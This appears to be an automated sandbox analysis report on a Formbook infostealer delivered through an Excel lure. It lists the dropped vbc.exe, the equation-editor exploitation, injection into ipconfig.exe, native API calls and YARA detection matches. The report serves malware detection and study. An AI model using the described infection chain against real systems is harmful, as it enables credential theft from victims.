          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 '8 t9 19 20 21 Open the ckkument In If this document was Microsof
          Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ~
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182FB NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009110D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009101D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00911148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00911930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00911D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FAD0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0239FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982FB NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0051632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_005167C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00516332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_005167C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00EC7AF1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00492078
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004934FA
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00490094
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00495E64
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00494879
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004904E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00494888
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0049A5C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00493200
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0049C6A0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401027
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BA2A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C6B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C7DE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00EC7AF1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00923040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099D06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009463DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00922305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00927353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00955485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00931489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A05E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00966540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00924680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009557C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099F8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009229B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009369FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009D3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CCBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009ADBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00947B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00952E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00992FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00930F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094DF7C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02451238
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023AE2E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B2305
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023FA37B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B7353
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023D63DB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023AF3CF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_024563BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0242D06D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023DD005
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023C905A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B3040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023AE0C6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023FA634
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02452622
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B4680
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023BE6C1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023BC7BC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0243579A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023E57C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023ED47D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0243443E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023C1489
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023E5485
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B351F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023F6540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_024305E3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023CC5F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02463A83
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023D7B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02436BCB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0243DBDA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0245CBA4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023AFBD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023D286D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023BC85C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0242F8C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0244F8EE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0243394B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02435955
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B29B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023C69FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0245098E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023E2E2F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023CEE4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023C0F3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023DDF7C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02422FDC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0244CFB1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023E0D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023BCD5B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0244FDDD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C7DE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C6B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_005167C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00515062
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_005132FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00511362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00513302
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_005175B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_005108F9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00510902
          Source: Shipping documents.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 023ADF5C appears 123 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 023F373B appears 245 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 023F3F92 appears 132 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 023AE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0241F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0091E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0091DF5C appears 121 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0098F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0096373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00963F92 appears 132 times
          Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@11/11
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Shipping documents.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD059.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
